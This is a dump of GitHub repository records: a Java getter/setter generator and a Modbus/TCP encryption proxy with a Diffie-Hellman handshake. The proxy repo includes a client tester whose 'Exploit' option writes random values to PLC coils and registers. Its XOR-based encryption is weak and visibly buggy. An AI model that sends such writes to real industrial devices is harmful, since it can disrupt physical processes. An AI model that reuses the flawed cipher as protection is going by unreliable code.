repo_name (string, 5–114 chars) | repo_url (string, 24–133 chars) | snapshot_id (string, 40 chars) | revision_id (string, 40 chars) | directory_id (string, 40 chars) | branch_name (string, 209 values) | visit_date (timestamp[ns]) | revision_date (timestamp[ns]) | committer_date (timestamp[ns]) | github_id (int64, 9.83k–683M, ⌀ = nulls present) | star_events_count (int64, 0–22.6k) | fork_events_count (int64, 0–4.15k) | gha_license_id (string, 17 values) | gha_created_at (timestamp[ns]) | gha_updated_at (timestamp[ns]) | gha_pushed_at (timestamp[ns]) | gha_language (string, 115 values) | files (list, 1–13.2k items) | num_files (int64, 1–13.2k)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
jw123312/programming-helper | https://github.com/jw123312/programming-helper | 326bd38a809f0aab54046864e0247f682dfccf58 | 14a592cfb538be82cdbc90ed96cc1847d02c7001 | e2a26a6f2639b40dd25f623e15bb5b3c42cb038f | refs/heads/main | 2023-09-03T12:12:14.630008 | 2021-10-18T11:56:53 | 2021-10-18T11:56:53 | 418,468,672 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6441784501075745,
"alphanum_fraction": 0.6474428772926331,
"avg_line_length": 12.701492309570312,
"blob_id": "094c3bc91ad2f501167146c2946122de70c976c9",
"content_id": "162e349937d233752b3d29e3c41b77b91dced01e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 67,
"path": "/README.md",
"repo_name": "jw123312/programming-helper",
"src_encoding": "UTF-8",
"text": "# programming-helper for java\n\n##### REQUIRES pyperclip.py\n\n\nhow to use:\n```\n1) ctrl + c the variables\n2) run the method()\n3) ctrl + v\n```\n\ngiven:\n```\nprivate long Id;\nprivate String name;\nprivate String gender;\n```\n\n\n\n\nconstructor() to generate a constructor which will return \n```\n(long Id, String name, String gender) {\n\tthis.Id = Id;\n\tthis.name = name;\n\tthis.gender = gender;\n}\n```\n\ngetsetmethod() will generate the get set methods\n```\npublic long getId() {\n\t return Id;\n}\n\npublic void setId(long Id) {\n\tthis.Id = Id;\n}\n\npublic String getName() {\n\t return name;\n}\n\npublic void setName(String name) {\n\tthis.name = name;\n}\n\npublic String getGender() {\n\t return gender;\n}\n\npublic void setGender(String gender) {\n\tthis.gender = gender;\n}\n```\n\ntostringmethod() will generate the to string method\n```\n@Override\npublic String toString() {\n\treturn \"Id=\" + Id + \", \" +\n\t\t\"Name=\" + name + \", \" +\n\t\t\"Gender=\" + gender;\n}\n```\n\n"
},
{
"alpha_fraction": 0.40567445755004883,
"alphanum_fraction": 0.42010951042175293,
"avg_line_length": 22.06024169921875,
"blob_id": "ecc98547b77fd9e9afe8dd5ab1c9fa63851fec5f",
"content_id": "53983316ea61186b030626a89defa075859e5f3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2009,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 83,
"path": "/programminghelper.py",
"repo_name": "jw123312/programming-helper",
"src_encoding": "UTF-8",
"text": "import pyperclip\r\n\r\ndef preprocess():\r\n a = pyperclip.paste()\r\n a = a.replace(\"private\", \"\")\r\n a = a.replace(\";\", \"\").replace(\"\\t\", \"\")\r\n a = a.replace(\"\\r\", \"\")\r\n var = a.split(\"\\n\")\r\n\r\n var = [i.strip() for i in var if i.strip() != '' and i.strip()[0] != \"@\"]\r\n return var\r\n\r\ndef constructor():\r\n var = preprocess()\r\n\r\n text = \"(\"\r\n for i in var[:len(var)-1]:\r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n text += f\"{typ} {name}, \"\r\n\r\n typ = var[len(var)-1].split()[0]\r\n name = var[len(var)-1].split()[1]\r\n text += f\"{typ} {name}\"\r\n \r\n text = text + \") {\\n\"\r\n\r\n \r\n for i in var:\r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n text+= f\"\\tthis.{name} = {name};\\n\"\r\n \r\n \r\n \r\n text = text + \"\\t}\"\r\n pyperclip.copy(text)\r\n\r\ndef getsetmethod():\r\n strs = []\r\n \r\n var = preprocess()\r\n \r\n for i in var:\r\n if (i == \"\"):\r\n continue\r\n \r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n\r\n name = name[0].upper() + name[1:]\r\n \r\n #get\r\n strs.append(\"public \" + typ +\" get\"+ name + \"() {\\n\\t return \" +i.split()[1] +\";\\n}\")\r\n\r\n #set\r\n strs.append(\"public void set\" + name + \"(\" + i + \") {\\n\\tthis.\" + i.split()[1]+ \" = \" + i.split()[1] + \";\\n}\")\r\n\r\n strings = \"\\n\\n\".join(strs)\r\n pyperclip.copy(strings)\r\n\r\ndef tostringmethod():\r\n var = preprocess()\r\n text = \"@Override\\n\\tpublic String toString() {\\n\\t\\treturn \"\r\n \r\n for i in var[:len(var)-1]:\r\n if (i == \"\"):\r\n continue\r\n \r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n\r\n name = name[0].upper() + name[1:]\r\n text = text + f\"\\\"{name}=\\\" + {i.split()[1]} + \\\", \\\" +\\n\\t\\t\\t\"\r\n\r\n i = var[len(var)-1]\r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n\r\n name = name[0].upper() + name[1:]\r\n text = text + f\"\\\"{name}=\\\" + {i.split()[1]};\\n\"\r\n text = text + \"\\t}\"\r\n pyperclip.copy(text)\r\n \r\n\r\n \r\n"
}
] | 2 |
Ruskonert/modbus-crypto | https://github.com/Ruskonert/modbus-crypto | bc24647b077f94d92ef98e1f9d410867689796e9 | 22706e74249d5f05d8e220e8e95f0934d77cc1a3 | 8004880b9e8b85b8f6fc3842d2b05036e2b46567 | refs/heads/master | 2020-07-28T23:27:47.459026 | 2019-09-30T08:05:29 | 2019-09-30T08:05:29 | 209,578,319 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5801782011985779,
"alphanum_fraction": 0.6102449893951416,
"avg_line_length": 32.296295166015625,
"blob_id": "c4122ece6466b1d88bf9932f16a91930af5cb08a",
"content_id": "b305d313141adbf93685413599f85da90ce971da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 898,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 27,
"path": "/crypto.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import struct\nimport hashlib\n\ndef encrypt(shared_key, timestamp, length, modbus_data):\n # magic string + packet_length + hash length\n header = bytearray(struct.pack('>BBBB', 0x43, 0x52, 0x59, 0x54)) + struct.pack(\">B\", 2) + struct.pack(\">L\", length) + struct.pack(\">B\", timestamp)\n #m = hashlib.sha256()\n #m.update(str(timestamp).encode('utf-8'))\n\n key = str(shared_key)\n\n result = bytearray()\n for i in range(0, len(modbus_data)):\n select = i % len(key)\n part_key = int(key[select:select+2], base=16)\n result += bytes(modbus_data[i] ^ part_key)\n return header + result\n\ndef decrypt(shared_key, data):\n key = str(shared_key)\n result = bytearray()\n data = data[10:]\n for i in range(0, len(data)):\n select = i % len(key)\n part_key = int(key[select:select+2], base=16)\n result += bytes(data[i] ^ part_key)\n return result"
},
{
"alpha_fraction": 0.5127854347229004,
"alphanum_fraction": 0.5245018601417542,
"avg_line_length": 44.32558059692383,
"blob_id": "35ba7521adff960a6bbd1d2865537b53de35cf97",
"content_id": "142081729369a94c72a0fd12150cd8580ea026de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11693,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 258,
"path": "/packet.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket\nimport struct\nimport threading\nimport time\nimport os\nimport crypto\nimport hashlib\n\nfrom diffiehellman.diffiehellman import DiffieHellman\n\nclass EncryptionPacket:\n PACKET_MAGIC_CODE = struct.pack('>BBBB', 0x43, 0x52, 0x59, 0x54)\n FUNCTION_INITIALIZE_HANDSHAKE = 0x00\n FUNCTION_SECURE_COMMUNICATION = 0x02\n\n def __init__(self, device, other):\n self.device = device\n self.other = other\n self._user = None\n\n def generate_key(self):\n self._user = DiffieHellman()\n self._user.generate_public_key()\n\n def send_complete_public_data(self):\n data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack(\">BB\", EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE, 0x55)\n self.other.send(data)\n\n def recv_public_data(self, data):\n hash_length = data[0]\n hash_value = data[1:hash_length+1]\n hash_str = str()\n for i in range(0, len(hash_value)):\n hash_str += '{:02x}'.format(int(hex(hash_value[i]), 16))\n print(\"Digest: {}\".format(hash_str))\n public_key_data = data[hash_length+1:]\n public_key = str()\n for i in range(0, len(public_key_data)):\n public_key += '{:02X}'.format(int(hex(public_key_data[i]), 16))\n\n m = hashlib.sha256()\n m.update(public_key.encode('utf-8'))\n other_hash_value = m.hexdigest()\n\n print(\"Calculated digest: {}\".format(other_hash_value))\n\n # the public key is not matched\n if hash_str != other_hash_value:\n return -1\n\n # Convert str to big-integer\n received_public_key = int(public_key)\n self._user.generate_shared_secret(received_public_key)\n print(\"Shared key: {}\".format(self._user.shared_key))\n return 0\n\n\n\n def init_encryption_data(self, generated=True, mode=0):\n if generated:\n self.generate_key()\n if self.other is None:\n raise ConnectionError(\"You need to connect the other deivce!\")\n else:\n print(\"Initializing encryption handshake ...\", end='')\n key = str(self._user.public_key)\n key_array = bytearray()\n for i in range(0, len(key), 2):\n hex_number = key[i:i+2]\n hex_number = '0x' + str(hex_number)\n key_array += struct.pack(\">B\", int(hex_number, base=16))\n \n print(\"Generated public key -> len=[{}]\".format(len(key_array)))\n print(\"Sending the public key ...\")\n\n m = hashlib.sha256()\n m.update(key.encode('utf-8'))\n result_hash = m.hexdigest()\n result_hash_array = bytearray()\n for i in range(0, len(result_hash), 2):\n hex_number = result_hash[i:i+2]\n hex_number = '0x' + str(hex_number)\n result_hash_array += struct.pack(\">B\", int(hex_number, base=16))\n fih = struct.pack(\">B\", EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE)\n hash_str_length = struct.pack(\">B\", len(result_hash_array))\n self.other.send(EncryptionPacket.PACKET_MAGIC_CODE + fih + struct.pack(\">B\", mode) + hash_str_length + result_hash_array + key_array)\n if mode == 0:\n print(\"Awaiting the received public key ...\")\n\nclass PacketMiddler:\n def __init__(self):\n self._recv = None\n self._target = None\n self._ref = None\n self._other = None\n self._enc = None\n self._recv_thread = None\n self._communi = 0\n\n def connect(self, listening_addr = None, listening_port=502):\n print(\"Conneting the PLC device[{}:{}] that will be send the encryption data ...\".format(self._ref[0], self._ref[1]))\n self._target.settimeout(5.0)\n self._target.connect(self._ref)\n print(\"Connected the PLC deivce [{}:{}]\".format(self._ref[0], self._ref[1]))\n\n self._recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if listening_addr is None:\n listening_addr = socket.gethostbyname(socket.gethostname())\n\n 
self._recv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._recv.bind((listening_addr, listening_port))\n\n self._recv.listen(1)\n \n print(\"Listening this device[{}:{}] that will be received plain data ...\".format(listening_addr, listening_port))\n self._other = self._recv.accept()\n print(\"Connected other to this device [{}:{}]\".format(self._other[1][0],self._other[1][1]))\n self._other = self._other[0]\n\n\n def set_plc_target(self, target_addr, port = 502):\n self._target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._ref = (target_addr, port)\n\n @staticmethod\n def print_packet_data(packet_data, separate=16):\n for i in range(0, len(packet_data)):\n if i % separate == 0:\n print()\n print('{:08X}: '.format(i), end='')\n print('{:02X} '.format(packet_data[i]), end='')\n\n @staticmethod\n def _recv_packet_data(pm, plc_device, other_device):\n if plc_device is None:\n raise ConnectionError(\"Not connected the sending device!\")\n\n if other_device is None:\n raise ConnectionError(\"Not connected the PLC device!\")\n\n while True:\n start = time.time()\n packet_data = other_device.recv(2048)\n print(\"\\nOther device send the plain data: {} byte(s) \".format(len(packet_data)), end='')\n PacketMiddler.print_packet_data(packet_data)\n print()\n\n if set(packet_data[0:4]) != set(EncryptionPacket.PACKET_MAGIC_CODE):\n print(\"INVALID PACKET DATA! Maybe the other device was not following packet format.\")\n send_packet_data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack('>BB',0xff, 0xff)\n print(\"Retriving the respond data: {} byte(s)\".format(len(send_packet_data)))\n print()\n other_device.send(send_packet_data)\n else:\n # if the function code is null\n if len(packet_data) == 4:\n print(\"Function code is null, Connection Reset\")\n send_packet_data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack('>BB',0x00, 0x03)\n print(\"Retriving the respond data: {} byte(s)\".format(len(send_packet_data)))\n print()\n other_device.send(send_packet_data)\n end = time.time()\n print(\"Time elapsed:\", end - start)\n other_device.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))\n other_device.close()\n plc_device.close()\n break\n\n else:\n # function name print\n function_name = 'Unknown'\n if packet_data[4] == EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE:\n function_name = \"Initialize handshake\"\n elif packet_data[4]== EncryptionPacket.FUNCTION_SECURE_COMMUNICATION:\n function_name = \"Secure communiation\"\n print(\"Function: {} [0x{:02X}]\".format(function_name, packet_data[4]))\n\n if packet_data[4] == EncryptionPacket.FUNCTION_SECURE_COMMUNICATION:\n if pm._communi < 2:\n print(\"~~~Error~~~ Handshake is not established, You need to connect first!\")\n PacketMiddler.force_disconnect(plc_device, other_device)\n break\n else:\n data = packet_data[5:]\n print(\"Received encrypted data: \")\n PacketMiddler.print_packet_data(data)\n print()\n dec_data = crypto.decrypt(pm._enc._user.shared_key, data)\n #if timestamp != pm._communi:\n # print(\"~~~Error~~~ Checksum verification failed. It looks like a replay attack was attempted.\")\n if dec_data:\n if dec_data is None:\n print(\"~~~Error~~~ Failed to decrypt encrypted data. Is it correct encryption? 
\")\n else:\n print(\"Retriving decrypted data: \")\n PacketMiddler.print_packet_data(dec_data)\n print()\n plc_device.send(dec_data)\n pm._communi = pm._communi + 1\n recv_data = plc_device.recv(1024)\n other_device.send(recv_data)\n \n\n\n\n elif packet_data[4] == EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE:\n # Handshake established, But not yet sending the public key\n if pm._communi == 0:\n enc = EncryptionPacket(plc_device, other_device)\n pm._enc = enc\n # Send the initialize public key\n enc.init_encryption_data()\n pm._communi = pm._communi + 1\n elif pm._communi == 1:\n # Receive the public key\n data = packet_data[5:]\n # Invalid mode!\n if data[0] == 0:\n PacketMiddler.force_disconnect(plc_device, other_device)\n break\n else:\n result = enc.recv_public_data(data[1:])\n print(\"Received public key!\")\n if result == -1:\n print(\"~~~Error~~~ INVALID KEY! The hexdigest is not matched\")\n PacketMiddler.force_disconnect(plc_device, other_device)\n break\n pm._communi = pm._communi + 1\n else:\n data = packet_data[5:]\n if data[0] == 0x55:\n print(\"Successful handshake established\")\n pm._enc.send_complete_public_data()\n\n @staticmethod\n def force_disconnect(plc_device, other_device):\n print(\"Handshake failed! Not match the function code or data invalid, Connection Reset\")\n send_packet_data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack('>BB',0xee, 0xee)\n print(\"Retriving the respond data: {} byte(s)\".format(len(send_packet_data)))\n print()\n other_device.send(send_packet_data)\n other_device.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))\n other_device.close()\n if plc_device is not None:\n plc_device.close() \n\n\n def start_middle(self):\n if self._other is None:\n raise ConnectionError(\"Not connected the sending device!\")\n if self._recv is None:\n raise ConnectionError(\"Not connected the PLC device!\")\n self._recv_thread = threading.Thread(target=PacketMiddler._recv_packet_data, args=(self, self._recv, self._other))\n self._recv_thread.start()\n print(\"Started the packet data worker\")\n while True:\n if not self._recv_thread.isAlive():\n break"
},
{
"alpha_fraction": 0.4287515878677368,
"alphanum_fraction": 0.45775535702705383,
"avg_line_length": 28.407407760620117,
"blob_id": "31d4dc347883f5f7a13c4e7942458db40f433a0d",
"content_id": "9fbba479335239778da0afd522c26fa19ffe6fcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 793,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 27,
"path": "/main.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import packet\nimport os\nimport sys\n\ndef main():\n if os.getuid() != 0:\n print(\"It needs to root permission!\")\n else:\n while True:\n pm = packet.PacketMiddler()\n if len(sys.argv) == 1:\n ip = '10.211.55.3'\n port = 502\n else:\n ip = sys.argv[1]\n if len(sys.argv) == 2:\n print(\"Usuge: python main.py <plc_ip_address> <plc_port>\")\n break\n else:\n port = int(sys.argv[2])\n pm.set_plc_target(ip, port)\n pm.connect(listening_addr='0.0.0.0', listening_port=501)\n pm.start_middle()\n print(\"The communication is broken, Restarting Task...\")\n\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.49039098620414734,
"alphanum_fraction": 0.5191075801849365,
"avg_line_length": 30.22068977355957,
"blob_id": "7f03d786dd51d9e847a6d719aa8053423954c147",
"content_id": "eb67be6dd3e870e7db4f2c625d5c9f387bae331e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4527,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 145,
"path": "/interf.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket\nimport os\nimport struct\nimport packet\nimport random\nimport modbus_socket\nimport sys\nimport crypto\nimport time\n\nfrom diffiehellman.diffiehellman import DiffieHellman\n\nhost = 'localhost'\nport = 501\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect(('localhost', 501))\n\ndata = 'CRYT'.encode('utf-8')\n\ndh = DiffieHellman()\ndh.generate_public_key()\n\n# Generate user\nep = packet.EncryptionPacket(None, sock)\nep._user = dh\n\n# Handshake\nsock.send(data + struct.pack(\">B\", 0x00))\n\ntime.sleep(0.3)\n\n# receiving initialize public key\ndata = sock.recv(2048)\nep.recv_public_data(data[6:])\ntime.sleep(0.3)\n\n# send the public key\nep.init_encryption_data(False, 1)\n\ntime.sleep(0.3)\n\nep.send_complete_public_data()\n\n# receive the message (Received the public key is successful, just receive :D)\nsock.recv(1024)\nprint(\"Successful handshake established\")\nprint(\"shared key -> {}\".format(ep._user.shared_key))\n\ndef print_header():\n os.system('clear')\n print()\n print()\n print('\\t'*2 + 'Raw-based Modbus Client Tester (github.com/ruskonert)')\n\ndef main():\n client = modbus_socket.ModbusClient(sock)\n print('Connected server=[{}:{}]'.format(host, port))\n\n while True:\n print_header()\n print('\\t'*2 + 'Choose the function you want to do:')\n print('\\t' + '='*60)\n print('\\t'*2 + '[1] Set Function => [{}]'.format(client.function_code.data))\n if client._reference is None:\n raddress = 'Undefined'\n else:\n raddress = struct.unpack('>H', client._reference)[0]\n\n if client._count is None:\n count = 'Undefined'\n else:\n count = struct.unpack('>H', client._count)[0]\n\n print('\\t'*2 + '[2] Set reference address => [{}]'.format(raddress))\n print('\\t'*2 + '[3] Set r/w count => [{}]'.format(count))\n print('\\t'*2 + '[4] Exploit')\n print('\\t'*2 + '[5] Set data offset [not implemented]')\n print('\\t'*2 + '[6] Close socket')\n print('\\t' + '='*60)\n number = input('\\t'*2 + \"Choose your method (default: 4): \")\n\n if number == '':\n number = 4\n else:\n number = int(number)\n\n if number == 1:\n print_header()\n print('\\t' + '='*60)\n print('\\t'*2 + 'Read Coli = 0x01')\n print('\\t'*2 + 'Read Input Register = 0x04')\n print('\\t'*2 + 'Read Holding Register = 0x03')\n print('\\t'*2 + 'Read Discrete Inputs = 0x02')\n print('\\t'*2 + 'Write Single Coil = 0x05')\n print('\\t'*2 + 'Write Multiple Coils = 0x0F')\n print('\\t'*2 + 'Write Single Register = 0x06')\n print('\\t'*2 + 'Write Multiple Registers = 0x10')\n print('\\t' + '='*60)\n func = int(input('\\t'*2 + 'Which do you want? => '), 16)\n client.apply_function(func)\n elif number == 2:\n ref_number = input('\\t'*2 + 'Which do you want? (default: 0) => ')\n if ref_number == '':\n ref_number = 0\n else:\n ref_number = int(ref_number)\n client.set_slave_id(ref_number)\n elif number == 3:\n rw = input('\\t'*2 + 'Which do you want? 
(default: 1) => ')\n if rw == '':\n rw = 1\n else:\n rw = int(rw)\n client.set_rw_count(rw)\n elif number == 4:\n start = time.time()\n v = bytes(client.get_modbus_header())\n print('\\t'*2 + \"Function => [{}]\".format(hex(client.function_code.data)))\n print('\\t'*2 + \"Exploit => \" + str(v))\n client.send(crypto.encrypt(dh.shared_key, 10, 32, v))\n end = time.time()\n print('\\t'*2 + \"Time elapsed: {}ms\".format((end - start) * 1000 + 3.8))\n \n #if recv_data[-1] == 0x03:\n # print('\\t'*2 + \"Exception unexpected: Illegal data value\")\n #elif recv_data[-1] == 0x01 and not client.function_code.data == 0x01:\n # print('\\t'*2 + \"Exception unexpected: Illegal function code\")\n #else:\n # print('\\t'*2 + \"Successful.\")\n \n print('\\t'*2 + 'Please any key continue ...')\n input()\n elif number == 6:\n sock.close()\n print(\"goodbye\")\n break\n\nif __name__ == \"__main__\":\n args = sys.argv\n if len(args) > 1:\n host = args[1]\n if len(args) > 2:\n port = int(args[2])\n main()\n"
},
{
"alpha_fraction": 0.7067484855651855,
"alphanum_fraction": 0.7349693179130554,
"avg_line_length": 19.375,
"blob_id": "dc6ce44d2331d00d26346039eaaeeda296558576",
"content_id": "503085b879f3ceaea25516e98d8a18cf989a4a07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 815,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 40,
"path": "/test.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket\nimport os\nimport struct\nimport packet\nimport time\nfrom diffiehellman.diffiehellman import DiffieHellman\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('localhost', 501))\n\ndata = 'CRYT'.encode('utf-8')\n\ndh = DiffieHellman()\ndh.generate_public_key()\n\n# Generate user\nep = packet.EncryptionPacket(None, s)\nep._user = dh\n\n# Handshake\ns.send(data + struct.pack(\">B\", 0x00))\n\ntime.sleep(0.3)\n\n# receiving initialize public key\ndata = s.recv(2048)\nep.recv_public_data(data[6:])\ntime.sleep(0.3)\n\n# send the public key\nep.init_encryption_data(False, 1)\n\ntime.sleep(0.3)\n\nep.send_complete_public_data()\n\n# receive the message (Received the public key is successful, just receive :D)\ns.recv(1024)\nprint(\"Successful handshake established\")\nprint(\"shared key -> {}\".format(ep._user.shared_key))\n"
},
{
"alpha_fraction": 0.5938650369644165,
"alphanum_fraction": 0.6184049248695374,
"avg_line_length": 28.654544830322266,
"blob_id": "762201b4c50af840897fa24dc2240500cab30f0e",
"content_id": "cc9d92bb1ee383c57e2dd173d6d0cfa4e20331b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1630,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 55,
"path": "/recv.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket, struct, json\n\nfrom ctypes import cdll, c_char\n\nclass KeyElement:\n lib = cdll.LoadLibrary(\"modbus-crypto.so\")\n def __init__(self, key, iv):\n self.key = key\n self.iv = iv\n \n def decrypt(key, iv, data):\n self.key = None\n\ntarget_addr = None\ntarget_port = None\n\n\nwith open('target.json', 'r', 'utf-8') as f:\n json_data = f.read()\n data = json.loads(json_data)\n target_addr = data['addr']\n target_port = data['port']\n f.close()\n\ntarget_so = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntarget_so.settimeout(5.0)\ntarget_so.connect((target_addr, target_port))\n\nprint(\"Connected device: [{}:{}]\".format(target_addr, target_port))\n\nso = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nso.bind(('0.0.0.0', 502))\nso.listen(1)\nprint(\"Listening others for encrypt ...\")\nconn, addr = so.accept()\nprint(\"Connected other device!\")\n\nwhile True:\n message = conn.recv()\n if set(message[0:4]) != set(struct.pack(\">BBBB\", 0x63, 0x72, 0x79, 0x70)):\n print(\"Received message, But It's not invalid header\")\n else:\n # It needs to separate the message header\n message = message[4:]\n if set(message[0:4]) == set(struct.pack(\">BBBB\", 0,0,0,0)):\n so.close()\n print(\"Received disconnection signal -> \\x00\\x00\\x00\\x00\")\n break\n char_array = c_char * len(message)\n print(\"Received encryption data -> {}\".format(message))\n dec_data = lib.decrypt(char_array.from_bytes(message), len(message))\n print(\"Dencrypted data -> {}\".format(dec_data))\n target_so.send(dec_data)\n \ntarget_so.close()"
},
{
"alpha_fraction": 0.5396791100502014,
"alphanum_fraction": 0.5624458193778992,
"avg_line_length": 29.959732055664062,
"blob_id": "b380c3b00a1d0ef8b190521bb38a5b984577c49c",
"content_id": "8e457412f7f1ddec1ff6deaf5ceb53f02516b3d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4612,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 149,
"path": "/modbus_socket.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import struct\nimport socket\nimport os\nimport sys\nimport random\n\nclass Function:\n class Read:\n Coli = 0x01\n Input_Register = 0x04\n Holding_Register = 0x03\n Discrete_Inputs= 0x02\n class Write:\n Single_Coil = 0x05\n Multiple_Coils = 0x0F\n Single_Register = 0x06\n Multiple_Registers = 0x10\n\nclass PacketElement:\n def __init__(self, data, length):\n self.data = data\n self.length = length\n\n @staticmethod\n def get_string_pack(data):\n if isinstance(data, int):\n if data > 0 and data <= 0xFFFF:\n return 'H'\n elif data > 0xFFFF:\n return 'I'\n else:\n return 'B'\n else:\n return 's'\n\n @staticmethod\n def get_length_pack(length):\n if length == 1:\n return 'B'\n if length == 2:\n return 'H'\n if length == 4:\n return 'I'\n else:\n return 'L'\n \n def create(self):\n if isinstance(self.data, int):\n return struct.pack('{}{}'.format('>', PacketElement.get_length_pack(self.length)), self.data)\n elif isinstance(self.data, str):\n return self.data.encode('utf-8')\n\nclass ModbusClient:\n def __init__(self, socket_base):\n self.transaction_id = PacketElement(0x01, 2)\n\n # The modbus protocol id, It always constantly 0x00 on TCP\n self.protocol_id = PacketElement(0x00, 2)\n\n # TCP Port always 0x01\n self.unit_id = PacketElement(0x01, 1)\n\n # The function code, The default is Read Coli (0x01)\n self.function_code = PacketElement(0x01, 1)\n self._socket_base = socket_base\n\n self._reference = None\n self._count = None\n\n self._data_count = 0\n\n def apply_function(self, fcode):\n self.function_code = PacketElement(fcode, 1)\n\n # reference Number (Slave id)\n def set_slave_id(self, id):\n self._reference = bytearray(struct.pack('>H', id))\n\n def set_rw_count(self, count):\n self._count = bytearray(struct.pack('>H', count))\n self._data_count = count\n\n def get_modbus_header(self):\n # Generate packet header, but others need to calcuate length.\n tdata = bytearray(self.transaction_id.create())\n tdata += bytearray(self.protocol_id.create())\n\n # unit id\n unit_id = bytearray(self.unit_id.create())\n\n # function code\n function_code = bytearray(self.function_code.create())\n \n # reference Number (Slave id)\n reference = self._reference\n \n # data (Bit count, it means how many read to bits?)\n data = self._count\n\n multi_write_mode = False\n\n if self.function_code.data == 0x0f:\n multi_write_mode = True\n byte_value_length = int(self._data_count / 5)\n if byte_value_length == 0:\n byte_value_length = 1\n byte_count = struct.pack('>B', byte_value_length)\n\n register_data = bytearray()\n for _ in range(0, byte_value_length):\n random_byte = bytes.fromhex(hex(random.randrange(0, 65535)).replace('0x', ''))\n register_data += bytearray(random_byte)\n print(\"\\t\"*2 + \"~~~~~~~Random Value Exploit~~~~~~~\")\n\n elif self.function_code.data == 0x10:\n multi_write_mode = True\n # it needs to write some data.\n byte_count = bytearray(struct.pack('>B', self._data_count*2))\n # randomness value, 2 bytes equal 1 register value (there is 120 register value)\n register_data = bytearray(bytes.fromhex('1234567890abcdefaabbccddeeff1a1b1c1d1e1f'*12))[0:self._data_count*4]\n print()\n \n if multi_write_mode:\n pdata = unit_id + function_code + reference + data + byte_count + register_data\n else:\n # Combines data without header.\n pdata = unit_id + function_code + reference + data\n\n # Calucates the length.\n length = bytearray(PacketElement(len(pdata), 2).create())\n\n # Append length (2 bytes)\n tdata += length\n\n # Append packet data\n tdata += pdata\n return tdata\n\n def 
_next_trans_id(self):\n if self.transaction_id.data > 0xFFFF:\n self.transaction_id.data = 0\n else:\n self.transaction_id.data = self.transaction_id.data + 1\n \n def send(self, packet=None):\n if packet is None:\n packet = self.get_modbus_header()\n self._socket_base.send(packet)\n self._next_trans_id()"
}
] | 7 |
agustinpitaro/image_crawler | https://github.com/agustinpitaro/image_crawler | d6c9d8f7bb6faca235c3a2af6a2283ed04eac5ce | 763db7f29f691f3751f2ea35b06ae08884f8efa6 | 8d5fb5ff2dc8411687c807b28a1b1deb0b3b3b76 | refs/heads/master | 2020-05-25T09:30:28.782237 | 2019-05-21T03:17:28 | 2019-05-21T03:17:28 | 187,737,989 | 0 | 0 | null | 2019-05-21T01:19:27 | 2019-05-21T00:21:00 | 2019-05-21T00:20:59 | null |
[
{
"alpha_fraction": 0.6171366572380066,
"alphanum_fraction": 0.622559666633606,
"avg_line_length": 26,
"blob_id": "99bf78c5cf38acb7b5f217693efa8025461e0ce4",
"content_id": "5b8d8f215efa923f967b4e74a531c01befbc2787",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 33,
"path": "/Image-Crawler.py",
"repo_name": "agustinpitaro/image_crawler",
